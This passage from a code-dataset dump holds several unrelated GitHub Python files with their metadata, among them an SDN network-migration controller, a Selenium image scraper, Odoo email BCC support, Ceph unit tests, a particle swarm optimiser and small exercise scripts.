remote_cmd.ssh_run_cmd(ovs2_IP,'sudo ifconfig eth1 up')\n remote_cmd.ssh_run_cmd(ovs5_IP,'sudo ifconfig eth1 up')\n\n log.info('bring down the interaces in ovs-4')\n #remote_cmd.ssh_run_cmd(ovs4_IP,'sudo ifconfig eth1 down')\n \n log.info('move ovs-3')\n log.debug('bring down the interfaces on ovs-3')\n remote_cmd.ssh_run_cmd(ovs3_IP,'sudo ifconfig eth1 down')\n\n log.info('request flow tables on ovs3')\n for connection in core.openflow._connections.values():\n if connection.dpid == ovs3_dpid:\n _request_flow_info(connection)\n\n elif event.connection.dpid == ovs3_dpid:\n log.info('bring down the interaces in ovs-5')\n #remote_cmd.ssh_run_cmd(ovs4_IP,'sudo ifconfig eth1 down')\n\n log.info('redirect at gateway 3 to vn2')\n for connection in core.openflow._connections.values():\n if connection.dpid == g3_dpid:\n _gw_to_vn(connection, 1, 3, 2)\n\n log.info('migration finished')\n global start_time\n migration_time = time.time() - start_time\n log.info(\"%s seconds\", migration_time)\n \ndef _drop(duration, connection, inport):\n if duration is not None:\n if not isinstance(duration, tuple):\n duration = (duration, duration)\n msg = of.ofp_flow_mod()\n msg.in_port = inport\n msg.idle_timeout = duration[0]\n msg.hard_timeout = duration[1]\n connection.send(msg)\n\ndef _flow_stats_to_flow_mod (flow, port_dict):\n actions = flow.get('actions', [])\n if not isinstance(actions, list): actions = [actions]\n actions = [_dict_to_action(a, port_dict) for a in actions]\n if 'output' in flow: \n a = of.ofp_action_output(port=_fix_of_int(flow['output']))\n po.actions.append(a)\n\n fm = of.ofp_flow_mod()\n match_list = flow.get('match')\n\n\n in_port = match_list.get('in_port')\n fm.match.in_port = port_dict[in_port]\n\n fm.match.dl_src = EthAddr(match_list.get('dl_src'))\n fm.match.dl_dst = EthAddr(match_list.get('dl_dst'))\n fm.match.dl_vlan = match_list.get('dl_vlan')\n if match_list.get('dl_type') == 'IP':\n fm.match.dl_type = 0x800\n elif match_list.get('dl_type') == 'ARP':\n fm.match.dl_type = 0x806\n fm.match.new_tos = match_list.get('nw_tos')\n fm.match.nw_proto = match_list.get('nw_proto')\n\n fm.match.nw_src = match_list.get('nw_src')\n fm.match.nw_dst = match_list.get('nw_dst')\n fm.match.tp_src = match_list.get('tp_src')\n fm.match.tp_dst = match_list.get('tp_dst')\n\n \n fm.actions = actions\n\n for k in ['cookie', 'idle_timeout', 'hard_timeout', 'priority']:\n if k in flow:\n setattr(fm, k, flow[k])\n #i = 0\n return fm\n\ndef _dict_to_action (d, port_dict) :\n d = d.copy()\n\n if 'port' in d:\n d['port'] = port_dict[d['port']]\n\n #if swap_port:\n #if 'port' in d:\n #if d['port'] == 1:\n #d['port']=2\n #elif d['port'] == 2:\n #d['port']=1\n\n t = d['type'].upper()\n del d['type']\n if not t.startswith(\"OFPAT_\"): t = \"OFPAT_\" + t\n t = of.ofp_action_type_rev_map[t]\n cls = of._action_type_to_class[t]\n a = cls(**d)\n return a\n\n \n# main functiont to launch the module\ndef launch ():\n from pox.lib.recoco import Timer\n\n # attach handsers to listners\n core.openflow.addListenerByName(\"FlowStatsReceived\", \n _handle_flowstats_received) \n\n # migrate virtual network\n _migrate_vn()\n\n","repo_name":"YimengZhao/VNM-GENI","sub_path":"python-code/controller/3-ovs-gw-tunnel/migrate_3_drop.py","file_name":"migrate_3_drop.py","file_ext":"py","file_size_in_byte":13474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12387815203","text":"from selenium import webdriver\nimport time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom lxml import etree\nimport requests\n\nbrowser= webdriver.Chrome(executable_path=r'E:\\software\\browser\\chromedriver_win32\\chromedriver.exe')\nwait = WebDriverWait(browser,20)\nbrowser.get('http://image.baidu.com/search/index?tn=baiduimage&ps=1&ct=201326592&lm=-1&cl=2&nc=1&ie=utf-8&word=美女')\n\nwhile True:\n\n print('==============')\n # 提取图片链接,并保存图片\n html = browser.page_source\n html = etree.HTML(html)\n img_content = html.xpath('//div[@id=\"imgid\"]/div[last()]//li/@data-objurl')\n for img in img_content:\n try:\n img_name = img[img.rfind('/'):]\n response = requests.get(img)\n img_text = response.content\n with open('./baidupic'+img_name,'wb') as f:\n f.write(img_text)\n print(img_name)\n except Exception as e:\n print(e)\n print(img,'失败')\n\n # 翻页\n browser.execute_script('window.scrollTo(0,document.body.scrollHeight)')\n time.sleep(4)\n\n\n","repo_name":"theme716/small-routine","sub_path":"insect/10.ten_day/2.selenium_baidu_pic.py","file_name":"2.selenium_baidu_pic.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41945989871","text":"from decay_chain import DecayChain\nfrom radon_setup import DC1Lambda, DC1Mode, DC2Lambda, DC2Mode\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nif __name__ == \"__main__\":\n Rn222_DC = DecayChain(DC1Lambda, DC1Mode)\n Rn220_DC = DecayChain(DC2Lambda, DC2Mode)\n\n sample_time = 3 # in seconds\n sample_duration = 60 * 5 # in seconds\n filling_time = 90 # in seconds\n\n x_220 = Rn220_DC.expected_counts(sample_time, sample_duration // sample_time, filling_time, counted=[\"a\"])\n x_222 = Rn222_DC.expected_counts(sample_time, sample_duration // sample_time, filling_time, counted=[\"a\"])\n\n print(\"x_220: \")\n print(x_220)\n plt.plot(x_220)\n plt.show()\n print(\"x_222: \")\n print(x_222)\n plt.plot(x_222)\n plt.show()\n\n X = np.transpose(np.vstack((x_222, x_220)))\n\n print(\"X: \")\n print(X)\n\n X_pi = np.matmul(np.linalg.inv(np.matmul(np.transpose(X), X)), np.transpose(X))\n print(\"(X' X)\\\\X': \")\n print(X_pi)\n","repo_name":"StephenStyles/Radon","sub_path":"Python/model_parameters.py","file_name":"model_parameters.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"22513793019","text":"from dataBase import *\nfrom utils import *\n\ndef cadastrarCliente():\n cliente = {\n \"Nome\": input(\"Nome: \"),\n \"CPF\": validaCPF(input(\"CPF: \")),\n \"RG\": validaRG(input(\"RG: \")),\n \"Nascimento\": validaDataNascimento(),\n \"CEP\": buscarCEP(input(\"CEP: \")),\n \"Complemento\": input(\"Complemento: \"),\n \"Número\": int(input(\"Número da residência: \"))\n }\n\n return cliente\n\ndef menuCliente():\n while True:\n print(\"Menu Cliente\")\n print(\"1 - Cadastrar Cliente\")\n print(\"2 - Alterar Cliente\")\n print(\"3 - Buscar Cliente\")\n print(\"4 - Deletar Cliente\")\n print(\"5 - Listar Clientes\")\n print(\"6 - Voltar ao menu anterior\")\n op = int(input(\"Digite a opção desejada: \"))\n\n if (op == 1):\n clear()\n try:\n cliente = cadastrarCliente()\n insertDataBase(cliente)\n except:\n print(\"Erro ao cadastrar cliente, tente novamente!\")\n \n elif (op == 2):\n clear()\n try:\n updateDataBase(input(\"Digite o CPF do cliente que deseja alterar: \"))\n except:\n print(\"Erro ao alterar cliente, tente novamente!\")\n \n elif (op == 3):\n clear()\n try:\n selectClienteDataBase(input(\"Digite o CPF do cliente que deseja buscar: \"))\n except:\n print(\"Erro ao buscar cliente, tente novamente!\")\n \n elif (op == 4):\n clear()\n try: \n deleteDataBase(input(\"Digite o CPF do cliente que deseja deletar: \"))\n except:\n print(\"Erro ao deletar cliente, tente novamente!\")\n \n elif (op == 5):\n clear()\n try:\n selectDataBase()\n except:\n print(\"Erro ao listar clientes, tente novamente!\")\n \n elif (op == 6):\n clear()\n return\n \n else:\n clear()\n print(\"Opção inválida, tente novamente!\")\n\n","repo_name":"FabioKishino/ada-python","sub_path":"cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12998308010","text":"import mock\n\nimport sys\n\nfrom test_utils import CharmTestCase\n\nsys.path.append('hooks')\n\nimport pause_resume as actions\n\n\nclass PauseTestCase(CharmTestCase):\n def setUp(self):\n super(PauseTestCase, self).setUp(\n actions, [\"check_call\",\n \"get_local_osd_ids\",\n \"set_unit_paused\",\n \"assess_status\"])\n\n def test_pauses_services(self):\n self.get_local_osd_ids.return_value = [5]\n actions.pause([])\n cmd = ['ceph', '--id',\n 'osd-upgrade', 'osd', 'out', '5']\n self.check_call.assert_called_once_with(cmd)\n self.set_unit_paused.assert_called_once_with()\n self.assess_status.assert_called_once_with()\n\n\nclass ResumeTestCase(CharmTestCase):\n def setUp(self):\n super(ResumeTestCase, self).setUp(\n actions, [\"check_call\",\n \"get_local_osd_ids\",\n \"clear_unit_paused\",\n \"assess_status\"])\n\n def test_pauses_services(self):\n self.get_local_osd_ids.return_value = [5]\n actions.resume([])\n cmd = ['ceph', '--id',\n 'osd-upgrade', 'osd', 'in', '5']\n self.check_call.assert_called_once_with(cmd)\n self.clear_unit_paused.assert_called_once_with()\n self.assess_status.assert_called_once_with()\n\n\nclass MainTestCase(CharmTestCase):\n def setUp(self):\n super(MainTestCase, self).setUp(actions, [\"action_fail\"])\n\n def test_invokes_action(self):\n dummy_calls = []\n\n def dummy_action(args):\n dummy_calls.append(True)\n\n with mock.patch.dict(actions.ACTIONS, {\"foo\": dummy_action}):\n actions.main([\"foo\"])\n self.assertEqual(dummy_calls, [True])\n\n def test_unknown_action(self):\n \"\"\"Unknown actions aren't a traceback.\"\"\"\n exit_string = actions.main([\"foo\"])\n self.assertEqual(\"Action foo undefined\", exit_string)\n\n def test_failing_action(self):\n \"\"\"Actions which traceback trigger action_fail() calls.\"\"\"\n dummy_calls = []\n\n self.action_fail.side_effect = dummy_calls.append\n\n def dummy_action(args):\n raise ValueError(\"uh oh\")\n\n with mock.patch.dict(actions.ACTIONS, {\"foo\": dummy_action}):\n actions.main([\"foo\"])\n self.assertEqual(dummy_calls, [\"Action foo failed: uh oh\"])\n","repo_name":"juanarturovargas/openstack-juju","sub_path":"ceph-osd/unit_tests/test_actions_pause_resume.py","file_name":"test_actions_pause_resume.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42994481869","text":"# -*- coding: utf-8 -*-\nfrom openerp.osv import fields, osv\nfrom datetime import datetime\nfrom openerp import tools\nfrom openerp import netsvc\nimport base64\nfrom openerp import SUPERUSER_ID\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nclass email_template(osv.osv):\n _inherit = \"email.template\"\n \n _columns = {\n 'email_bcc': fields.char('Bcc', help=\"Blind carbon copy recipients (placeholders may be used here)\"),\n }\n \n def generate_email_batch(self, cr, uid, template_id, res_ids, context=None, fields=None):\n \"\"\"Generates an email from the template for given the given model based on\n records given by res_ids.\n\n :param template_id: id of the template to render.\n :param res_id: id of the record to use for rendering the template (model\n is taken from template definition)\n :returns: a dict containing all relevant fields for creating a new\n mail.mail entry, with one extra key ``attachments``, in the\n format [(report_name, data)] where data is base64 encoded.\n \"\"\"\n if context is None:\n context = {}\n if fields is None:\n #NG: add email_bcc to fields\n fields = ['subject', 'body_html', 'email_from', 'email_to', 'email_bcc', 'partner_to', 'email_cc', 'reply_to']\n\n report_xml_pool = self.pool.get('ir.actions.report.xml')\n res_ids_to_templates = self.get_email_template_batch(cr, uid, template_id, res_ids, context)\n\n # templates: res_id -> template; template -> res_ids\n templates_to_res_ids = {}\n for res_id, template in res_ids_to_templates.iteritems():\n templates_to_res_ids.setdefault(template, []).append(res_id)\n\n results = dict()\n for template, template_res_ids in templates_to_res_ids.iteritems():\n # generate fields value for all res_ids linked to the current template\n for field in fields:\n generated_field_values = self.render_template_batch(\n cr, uid, getattr(template, field), template.model, template_res_ids,\n post_process=(field == 'body_html'),\n context=context)\n for res_id, field_value in generated_field_values.iteritems():\n results.setdefault(res_id, dict())[field] = field_value\n # compute recipients\n results = self.generate_recipients_batch(cr, uid, results, template.id, template_res_ids, context=context)\n # update values for all res_ids\n for res_id in template_res_ids:\n values = results[res_id]\n # body: add user signature, sanitize\n if 'body_html' in fields and template.user_signature:\n signature = self.pool.get('res.users').browse(cr, uid, uid, context).signature\n values['body_html'] = tools.append_content_to_html(values['body_html'], signature)\n if values.get('body_html'):\n values['body'] = tools.html_sanitize(values['body_html'])\n # technical settings\n values.update(\n mail_server_id=template.mail_server_id.id or False,\n auto_delete=template.auto_delete,\n model=template.model,\n res_id=res_id or False,\n attachment_ids=[attach.id for attach in template.attachment_ids],\n )\n\n # Add report in attachments: generate once for all template_res_ids\n if template.report_template:\n for res_id in template_res_ids:\n attachments = []\n report_name = self.render_template(cr, uid, template.report_name, template.model, res_id, context=context)\n report = report_xml_pool.browse(cr, uid, template.report_template.id, context)\n report_service = report.report_name\n # Ensure report is rendered using template's language\n ctx = context.copy()\n if template.lang:\n ctx['lang'] = self.render_template_batch(cr, uid, template.lang, template.model, [res_id], context)[res_id] # take 0 ?\n\n if report.report_type in ['qweb-html', 'qweb-pdf']:\n result, format = self.pool['report'].get_pdf(cr, uid, [res_id], report_service, context=ctx), 'pdf'\n else:\n result, format = openerp.report.render_report(cr, uid, [res_id], report_service, {'model': template.model}, ctx)\n \n # TODO in trunk, change return format to binary to match message_post expected format\n result = base64.b64encode(result)\n if not report_name:\n report_name = 'report.' + report_service\n ext = \".\" + format\n if not report_name.endswith(ext):\n report_name += ext\n attachments.append((report_name, result))\n results[res_id]['attachments'] = attachments\n\n return results\n\nemail_template()\n\nclass mail_mail(osv.osv):\n _inherit = \"mail.mail\"\n \n _columns = {\n 'email_bcc': fields.char('Bcc', help=\"Blind carbon copy recipients (placeholders may be used here)\"),\n }\n \n def send(self, cr, uid, ids, auto_commit=False, raise_exception=False, context=None):\n \"\"\" Sends the selected emails immediately, ignoring their current\n state (mails that have already been sent should not be passed\n unless they should actually be re-sent).\n Emails successfully delivered are marked as 'sent', and those\n that fail to be deliver are marked as 'exception', and the\n corresponding error mail is output in the server logs.\n\n :param bool auto_commit: whether to force a commit of the mail status\n after sending each mail (meant only for scheduler processing);\n should never be True during normal transactions (default: False)\n :param bool raise_exception: whether to raise an exception if the\n email sending process has failed\n :return: True\n \"\"\"\n if context is None:\n context = {}\n ir_mail_server = self.pool.get('ir.mail_server')\n ir_attachment = self.pool['ir.attachment']\n for mail in self.browse(cr, SUPERUSER_ID, ids, context=context):\n try:\n # TDE note: remove me when model_id field is present on mail.message - done here to avoid doing it multiple times in the sub method\n if mail.model:\n model_id = self.pool['ir.model'].search(cr, SUPERUSER_ID, [('model', '=', mail.model)], context=context)[0]\n model = self.pool['ir.model'].browse(cr, SUPERUSER_ID, model_id, context=context)\n else:\n model = None\n if model:\n context['model_name'] = model.name\n\n # load attachment binary data with a separate read(), as prefetching all\n # `datas` (binary field) could bloat the browse cache, triggerring\n # soft/hard mem limits with temporary data.\n attachment_ids = [a.id for a in mail.attachment_ids]\n attachments = [(a['datas_fname'], base64.b64decode(a['datas']))\n for a in ir_attachment.read(cr, SUPERUSER_ID, attachment_ids,\n ['datas_fname', 'datas'])]\n\n # specific behavior to customize the send email for notified partners\n email_list = []\n if mail.email_to:\n email_list.append(self.send_get_email_dict(cr, uid, mail, context=context))\n for partner in mail.recipient_ids:\n email_list.append(self.send_get_email_dict(cr, uid, mail, partner=partner, context=context))\n # headers\n headers = {}\n bounce_alias = self.pool['ir.config_parameter'].get_param(cr, uid, \"mail.bounce.alias\", context=context)\n catchall_domain = self.pool['ir.config_parameter'].get_param(cr, uid, \"mail.catchall.domain\", context=context)\n if bounce_alias and catchall_domain:\n if mail.model and mail.res_id:\n headers['Return-Path'] = '%s-%d-%s-%d@%s' % (bounce_alias, mail.id, mail.model, mail.res_id, catchall_domain)\n else:\n headers['Return-Path'] = '%s-%d@%s' % (bounce_alias, mail.id, catchall_domain)\n\n # build an RFC2822 email.message.Message object and send it without queuing\n res = None\n for email in email_list:\n msg = ir_mail_server.build_email(\n email_from=mail.email_from,\n email_to=email.get('email_to'),\n subject=email.get('subject'),\n body=email.get('body'),\n body_alternative=email.get('body_alternative'),\n email_cc=tools.email_split(mail.email_cc),\n #NG: add email_bcc from mail\n email_bcc=tools.email_split(mail.email_bcc),\n reply_to=mail.reply_to,\n attachments=attachments,\n message_id=mail.message_id,\n references=mail.references,\n object_id=mail.res_id and ('%s-%s' % (mail.res_id, mail.model)),\n subtype='html',\n subtype_alternative='plain',\n headers=headers)\n res = ir_mail_server.send_email(cr, uid, msg,\n mail_server_id=mail.mail_server_id.id,\n context=context)\n\n if res:\n mail.write({'state': 'sent', 'message_id': res})\n mail_sent = True\n else:\n mail.write({'state': 'exception'})\n mail_sent = False\n\n # /!\\ can't use mail.state here, as mail.refresh() will cause an error\n # see revid:odo@openerp.com-20120622152536-42b2s28lvdv3odyr in 6.1\n self._postprocess_sent_message(cr, uid, mail, context=context, mail_sent=mail_sent)\n _logger.info('Mail with ID %r and Message-Id %r successfully sent', mail.id, mail.message_id)\n except MemoryError:\n # prevent catching transient MemoryErrors, bubble up to notify user or abort cron job\n # instead of marking the mail as failed\n _logger.exception('MemoryError while processing mail with ID %r and Msg-Id %r. '\\\n 'Consider raising the --limit-memory-hard startup option',\n mail.id, mail.message_id)\n raise\n except Exception as e:\n _logger.exception('failed sending mail.mail %s', mail.id)\n mail.write({'state': 'exception'})\n self._postprocess_sent_message(cr, uid, mail, context=context, mail_sent=False)\n if raise_exception:\n if isinstance(e, AssertionError):\n # get the args of the original error, wrap into a value and throw a MailDeliveryException\n # that is an except_orm, with name and value as arguments\n value = '. '.join(e.args)\n raise MailDeliveryException(_(\"Mail Delivery Failed\"), value)\n raise\n\n if auto_commit is True:\n cr.commit()\n return True\n \nmail_mail()","repo_name":"lengocphat/DATN_phat_an","sub_path":"odoo-8.0/addons/vhr_base/model/email_template.py","file_name":"email_template.py","file_ext":"py","file_size_in_byte":12041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22962439162","text":"\"\"\"\nhttps://leetcode.com/problems/detect-capital/\n\nWe define the usage of capitals in a word to be \nright when one of the following cases holds:\n- All letters in this word are capitals, like \"USA\".\n- All letters in this word are not capitals, like \"leetcode\".\n- Only the first letter in this word is capital, like \"Google\".\n\nGiven a string word, return true if the usage of \ncapitals in it is right.\n\nExample 1:\nInput: word = \"USA\"\nOutput: true\n\nExample 2:\nInput: word = \"FlaG\"\nOutput: false\n\nConstraints:\n1 <= word.length <= 100\nword consists of lowercase and uppercase English letters.\n\"\"\"\n\n\ndef count_capitals(word: str) -> bool:\n # Time complexity: O(n)\n # Space complexity: O(1)\n num_capital_letters = sum(ord(c) < ord(\"a\") for c in word)\n n = len(word)\n if num_capital_letters == n or num_capital_letters == 0:\n return True\n if num_capital_letters == 1:\n return ord(word[0]) < ord(\"a\")\n return False\n\n\ndef count_capitals2(word: str) -> bool:\n # Time complexity: O(n)\n # Space complexity: O(1)\n # Use python built-in methods (slower)\n num_capital_letters = sum(c.isupper() for c in word)\n n = len(word)\n if num_capital_letters == n or num_capital_letters == 0:\n return True\n if num_capital_letters == 1:\n return word[0].isupper()\n return False\n\n\ndef python_methods(word: str) -> bool:\n # Time complexity: O(n)\n # Space complexity: O(1)\n # Use python built-in methods (even slower)\n return word.isupper() or word.islower() or word.istitle()\n\n\nif __name__ == \"__main__\":\n print(\"-\" * 60)\n print(\"Detect capital\")\n print(\"-\" * 60)\n\n test_cases = [\n (\"USA\", True),\n (\"Google\", True),\n (\"GooGlE\", False),\n (\"leetcode\", True),\n (\"leetCode\", False),\n (\"ALGORITHm\", False),\n ]\n\n for word, solution in test_cases:\n\n print(\"Word:\", word)\n\n result = count_capitals(word)\n output = f\" count_capitals = \"\n test_ok = solution == result\n output += str(result)\n output += \" \" * (50 - len(output))\n output += f'Test: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = count_capitals2(word)\n output = f\" count_capitals2 = \"\n test_ok = solution == result\n output += str(result)\n output += \" \" * (50 - len(output))\n output += f'Test: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = python_methods(word)\n output = f\" python_methods = \"\n test_ok = solution == result\n output += str(result)\n output += \" \" * (50 - len(output))\n output += f'Test: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n print()\n","repo_name":"daalgi/algorithms","sub_path":"strings/detect_capital.py","file_name":"detect_capital.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31367680409","text":"import spacy\nimport requests\n\nnlp = spacy.load(\"en_core_web_md\")\n\napi_key = \"7f344331d0b2323597bb5c0818ed1cce\"\n\n\ndef chatbot(statement):\n weather = nlp(\"Current weather in a city\")\n statement = nlp(statement)\n min_similarity = 0.70\n \n if weather.similarity(statement) >= min_similarity:\n #pass\n #test_1:\n #similarity = weather.similarity(statement)\n #return similarity\n \n for ent in statement.ents:\n if ent.label_ == \"GPE\": # GeoPolitical Entity\n city = ent.text\n #break\n return city\n else:\n return \"You need to tell me a city to check.\" \n\n#test_2:\t\n\t\ncity1 = chatbot(\"What is the weather in Kiev\")\nprint(city1) \t\n\t\n\n","repo_name":"vi-u/24-extract-the-name-of-city-from-the-user-statement","sub_path":"w_3_just_city_good.py","file_name":"w_3_just_city_good.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"74143350973","text":"import cv2\nfrom skimage import filters\n\n\nimg = cv2.imread(\n \"/Users/pyanezs/Documents/procesamiento-imagenes/Fotos/cameraman.png\")\n\n# Transforma imagen a escala de grises\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nprewitt = filters.prewitt(gray)\n\ncv2.imshow(\"Prewwit\", prewitt)\n\ncv2.waitKey(0)\n","repo_name":"pyanezs/procesamiento-imagenes","sub_path":"03-Espacio-Frecuencia/codigos_clase/09_filtro_prewitt.py","file_name":"09_filtro_prewitt.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"45493330464","text":"from numpy import exp, array, dot, tanh, cos, asarray\nfrom ann import ArtificialNeuralNetwork, NeuralLayer\nfrom utils import *\nimport random\nfrom sys import exit\n\nvp = 0.5 #velocity proportion\npbp = 0.2 #personal best proportion\ngbp = 0.1 # global best proportion\njp = 0.05 # velocity jump size\n\npso_iterations = 100\ntarget_error = 1e-6\npso_particles = 40\n\n#ANN (Particle Settings)\n# Note : provide ANN layer based on input.\n# For eg for data set 0,1,2,3 give like array([[2,1],[2,2],[1,2]])\n# For data set 4 & 5 give like array([[2,2],[3,2],[1,3]])\nann_layer_config = array([[2,2],[2,2],[1,2]])\n# Activation functions Null -> 0 , Sigmoid -> 1, Hyperbloic Tan -> 2, Cosine -> 3, Gaussian -> 4\nactivation_function = 4\n# Data set file cubic -> 0 , linear -> 1, sine -> 2, tanh -> 3, complex -> 4, xor -> 5\ndata_set = 4\n\n#Particle class to keep the ANN details\nclass Particle():\n def __init__(self):\n self.ann_layer_config = ann_layer_config\n self.position = array([0, 0])\n self.pbest_position = self.position\n self.pbest_value = float('inf')\n # Create the ANN for this particle\n self.create_ann()\n\n def __str__(self):\n print(\"I am at \", self.position, \" meu pbest is \", self.pbest_position)\n\n #Adjust the postions (weights of particle)\n def move(self):\n self.position = self.position + dot(jp,self.velocity)\n self.set_ann_weights()\n\n #Create ANN with given configs and training data\n def create_ann(self):\n data = getDataFromFile(data_set)\n self.ann = ArtificialNeuralNetwork(self.ann_layer_config, activation_function, data[0], data[1] )\n self.set_initial_position()\n self.set_ann_weights()\n\n #Pass self position values to ANN to set weights\n def set_ann_weights(self):\n self.ann.set_weights_from_position(self.position)\n\n # Create array of random values\n def set_initial_position(self):\n init_position = []\n init_velocity = []\n for layer_config in self.ann_layer_config:\n for i in range(dot(layer_config[0],layer_config[1])):\n init_position.append(self.create_random())\n init_velocity.append(0)\n self.position = asarray(init_position)\n self.velocity = asarray(init_velocity)\n #Keep the same random as initial personal best value\n self.pbest_position = self.position\n\n def create_random(self):\n return random.uniform(-100,100)\n\nclass PSO_Space():\n\n def __init__(self, target, target_error, pso_particles):\n self.ann_layer_config = ann_layer_config\n self.target = target\n self.target_error = target_error\n self.pso_particles = pso_particles\n self.particles = []\n self.gbest_value = float('inf')\n self.gbest_position = array([0,0])\n self.set_initial_gbest_position()\n\n #Set initial random global best values\n def set_initial_gbest_position(self):\n init_gbest_position = []\n for layer_config in self.ann_layer_config:\n for i in range(dot(layer_config[0],layer_config[1])):\n init_gbest_position.append(self.create_random())\n self.gbest_position = asarray(init_gbest_position)\n\n def create_random(self):\n return random.uniform(-100,100)\n\n #Fitness function returns the MSE value of particle\n def fitness_func(self, particle):\n return particle.ann.mse\n\n #Find and set personal best position values based on MSE\n def set_personal_best(self):\n for particle in self.particles:\n fitness_value = self.fitness_func(particle)\n if (particle.pbest_value > fitness_value):\n particle.pbest_value = fitness_value\n particle.pbest_position = particle.position\n\n #Find and set global best position values based on MSE\n def set_global_best(self):\n for particle in self.particles:\n best_fitness_value = self.fitness_func(particle)\n if (self.gbest_value > best_fitness_value):\n self.gbest_value = best_fitness_value\n self.gbest_position = particle.position\n\n #Forward the ANN with training input\n def forwardfeed_particles(self):\n for particle in self.particles:\n particle.ann.forward_inside_ann()\n\n #Adjust the particles position\n def adjust_particles(self):\n for particle in self.particles:\n new_velocity = (vp * particle.velocity) + (random.uniform(0.0,pbp)) * (\n particle.pbest_position - particle.position) + \\\n (random.uniform(0.0, gbp)) * (self.gbest_position - particle.position)\n particle.velocity = new_velocity\n particle.move()\n\n#Create PSO\npso = PSO_Space(1, target_error, pso_particles)\n#Set particles for the PSO\npso.particles = [Particle() for _ in range(pso.pso_particles)]\n\niteration = 0\nwhile (iteration < pso_iterations):\n pso.forwardfeed_particles()\n pso.set_personal_best()\n pso.set_global_best()\n\n if (abs(pso.gbest_value - pso.target) <= pso.target_error):\n break\n\n pso.adjust_particles()\n iteration += 1\n if(iteration == 1):\n print(\"Initial MSE\", pso.particles[0].ann.mse, \" and weights for first particle\", pso.particles[0].position)\n\nprint(\"Final MSE\", pso.particles[0].ann.mse, \" and weights for first particle\", pso.particles[0].position)\n\n#Testing the output with the sample input\n#pso.particles[0].ann.set_weights_from_position(pso.gbest_position)\n#pso.particles[0].ann.set_input_values(array([0, 0, 1]))\n#pso.particles[0].ann.forward_inside_ann()\n#print (pso.particles[0].ann.ann_output)","repo_name":"sl1984/BiologicallyInspiredComputing","sub_path":"new/pso.py","file_name":"pso.py","file_ext":"py","file_size_in_byte":5640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31836757298","text":"from selenium.webdriver.firefox.options import Options\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport os\nimport shutil\n\ndef init_browser():\n opts = Options()\n\n selenum_url = os.environ.get('PA_SELENUM_URL', None)\n\n if selenum_url != None:\n o = webdriver.ChromeOptions()\n o.add_argument(\"disable-dev-shm-usage\")\n o.add_argument(\"--no-sandbox\")\n o.add_argument('--disable-gpu')\n o.add_argument('--disable-setuid-sandbox')\n\n d = webdriver.Remote(selenum_url, DesiredCapabilities.CHROME, options=o)\n else:\n headless = os.environ.get('PA_HEADLESS', 'no')\n if headless == 'no':\n opts.headless = False\n else:\n opts.headless = True\n opts.binary_location = shutil.which('firefox')\n d = webdriver.Firefox(options=opts, log_path='test.log')\n \n d.set_window_size(1600,900)\n return d","repo_name":"CarlosRuizAscacibar/personal_automation","sub_path":"util/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74809988730","text":"\n# Classic 5x5 A1\n# columnCounts = [2, 0, 1, 1, 1]\n# numberOfColumns = len(columnCounts)\n# rowCounts = [1, 1, 0, 2, 1]\n# numberOfRows = len(rowCounts)\n# grid = [\n# list(\"XXXXX\"),\n# list(\"XTXTX\"),\n# list(\"XXXXX\"),\n# list(\"TTXXX\"),\n# list(\"XXXXT\")\n# ]\n\n# Classic 10x10 A1\n# columnCounts = [4,1,2,1,3,1,3,0,2,3]\n# numberOfColumns = len(columnCounts)\n# rowCounts = [3,0,2,2,0,5,0,4,0,4]\n# numberOfRows = len(rowCounts)\n# grid = [\n# list(\"XTXXXXXXTX\"),\n# list(\"TXXXXTXXXX\"),\n# list(\"XXXXXXXXTX\"),\n# list(\"XTTXXXXXXX\"),\n# list(\"XXXXXXXXXX\"),\n# list(\"XTXXXTXXXX\"),\n# list(\"TTXXTXTXXT\"),\n# list(\"XXXXXTXXXX\"),\n# list(\"TXXXXXXXTX\"),\n# list(\"XXXTXXXTXT\")\n# ]\n\n# Large 20x20 A1\ncolumnCounts = [5,4,3,4,4,3,6,1,6,2,4,3,5,4,4,2,7,2,5,4]\nnumberOfColumns = len(columnCounts)\nrowCounts = [6,2,6,1,8,0,8,1,9,0,7,1,7,1,3,3,4,3,5,3]\nnumberOfRows = len(rowCounts)\ngrid = [\n list(\"XTTXXXXXXXXXXXXXXTTX\"),\n list(\"XXXXXXTXXXXTXTXXXXTX\"),\n list(\"XXXXXXXXTXXXXTXXXTXX\"),\n list(\"XTXXXXTXXXXXTXTXTXTX\"),\n list(\"XTXXTXXTXTXTXXXTXXXX\"),\n list(\"XXXXXXXXXXXXXXXXXTXX\"),\n 